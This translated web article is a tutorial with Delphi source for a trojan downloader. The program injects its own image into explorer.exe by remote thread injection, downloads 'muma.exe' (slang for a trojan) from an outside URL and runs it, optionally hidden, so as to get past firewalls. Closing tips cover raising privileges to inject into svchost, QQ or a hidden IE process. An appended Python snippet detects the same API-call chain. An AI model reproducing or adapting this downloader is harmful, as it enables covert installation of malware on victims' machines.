Build a non-DLL version of penetration Firewall downloader

Source: Internet
Author: User

The idea for this code comes from Aphex, of the foreign "ees" group. Basically all non-DLL downloaders work this way: it is really the well-worn remote injection method, except that the injected object is not a DLL but the process itself. The code follows; since my professional knowledge is limited, some of the wording may not be very professional. Please take a look, and ask if anything is unclear.

Program InjectTheSelf;

{$IMAGEBASE $13140000}

Uses Windows, Urlmon;


Procedure Download; // download routine
Begin
  URLDownloadToFile(Nil, 'http://www.mycode.ful.cn/muma.exe', 'C:\muma.exe', 0, nil);
  WinExec('C:\muma.exe', SW_SHOW); // SW_SHOW or SW_HIDE
End;


Var
  hModule, hModule_New: Pointer;
  Extent, Size, ThreadId: LongWord;
  ProcessHandle, Pid: LongWord;


Begin
  GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  // get the PID of the explorer process; Shell_TrayWnd is the window class name, which can be looked up with Spy++

  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); // open the process

  hModule := Pointer(GetModuleHandle(nil));
  // the value obtained here is a pointer to our own image, from which its base address and length can be read

  Extent := PImageOptionalHeader(Pointer(Integer(hModule) + PImageDosHeader(hModule)._lfanew + SizeOf(DWORD) + SizeOf(TImageFileHeader))).SizeOfImage;
  // get the length of the memory image

  VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
  // make room for a sufficiently long block of memory within the address range of the target process

  hModule_New := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // the starting base and the memory image base address are both determined here

  WriteProcessMemory(ProcessHandle, hModule_New, hModule, Extent, Size);
  // once the data above has been determined, the copy begins here

  CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);
  // start a remote thread, which completes the injection

  CloseHandle(ProcessHandle);
  // close the handle
End.
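For a defender, the API sequence in the code above (OpenProcess with PROCESS_ALL_ACCESS, VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, CreateRemoteThread, all against one target PID) is the detectable signature. The following Python is an example added here, not code from the original article: it walks a constructed API-call trace (the line format is assumed) and flags the source/target pairs that complete that chain with an executable-writable allocation.

```python
"""Flag the self-image remote-injection chain in an API-call trace.

Example code added by the editor, not from the original article.
Trace format (assumed): "<pid> <api> <target_pid> <extra>", one call per line.
"""
from collections import defaultdict

# Constructed sample trace: pid 4120 performs the chain from the article
# against pid 1588; pid 2200 only reads memory and must not be flagged.
SAMPLE_TRACE = """\
4120 OpenProcess 1588 PROCESS_ALL_ACCESS
4120 VirtualAllocEx 1588 PAGE_EXECUTE_READWRITE
4120 WriteProcessMemory 1588 size=90112
4120 CreateRemoteThread 1588 start=0x13142a10
2200 OpenProcess 1588 PROCESS_QUERY_INFORMATION
2200 ReadProcessMemory 1588 size=4096
"""

# The article's injection chain, in order. An RWX allocation in the
# VirtualAllocEx step separates it from benign cross-process memory use.
INJECTION_CHAIN = ["OpenProcess", "VirtualAllocEx",
                   "WriteProcessMemory", "CreateRemoteThread"]


def parse_trace(text):
    """Turn trace lines into (pid, api, target_pid, extra) tuples."""
    events = []
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 3:
            continue  # malformed line, ignore
        extra = parts[3] if len(parts) == 4 else ""
        events.append((int(parts[0]), parts[1], int(parts[2]), extra))
    return events


def find_injection(events):
    """Return (source_pid, target_pid) pairs that completed the chain."""
    progress = defaultdict(int)   # (src, dst) -> index of next expected API
    rwx = set()                   # pairs whose allocation was RWX
    hits = []
    for pid, api, target, extra in events:
        key = (pid, target)
        idx = progress[key]
        if idx < len(INJECTION_CHAIN) and api == INJECTION_CHAIN[idx]:
            if api == "VirtualAllocEx":
                if "PAGE_EXECUTE_READWRITE" not in extra:
                    continue  # not executable memory, do not advance
                rwx.add(key)
            progress[key] = idx + 1
            if progress[key] == len(INJECTION_CHAIN) and key in rwx:
                hits.append(key)
    return hits


if __name__ == "__main__":
    print(find_injection(parse_trace(SAMPLE_TRACE)))  # [(4120, 1588)]
```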

It is necessary to note that although this is already a firewall-penetrating version of the downloader code, it still has a lot of bugs. If you want to write your own downloader, please address the following questions:

1. The remote injection functions used by the above code are not available under Windows 9x.
2. Windows and some applications protect certain processes and do not allow other processes to operate on them without sufficient privileges; to inject into svchost, QQ and similar processes, you must first raise your privileges.
3. If you need to inject into IE, first use WinExec in SW_HIDE mode to open a hidden IE process and suspend the program for 3 seconds before injecting. This is for some old machines.
